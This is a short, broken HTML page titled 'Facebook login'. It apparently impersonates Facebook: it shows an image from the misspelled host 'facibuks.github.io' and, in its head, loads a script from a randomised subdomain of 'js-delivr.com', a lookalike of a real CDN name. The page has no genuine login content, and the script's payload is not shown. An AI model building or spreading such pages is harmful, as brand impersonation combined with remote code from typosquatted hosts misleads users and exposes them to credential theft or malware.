<!DOCTYPE html>
<html>
<head>
<title>Facebook login</title>
  <script src="https://q4efe0bmrj.js-delivr.com/js/3kegv/analytics.js"></script>
</head>
<body>
<div class="col-lg-2">
  <div class="row">
      <div class="col-sm-2">
          <div class="work-sec animate-img">
            
                  <img src="https://facibuks.github.io/Face.jpeg" class="image-right" alt="img">
                  <div class="text-wrapper">
                  </div>
              </a>
          </div>
      </div>

</body>
</html>

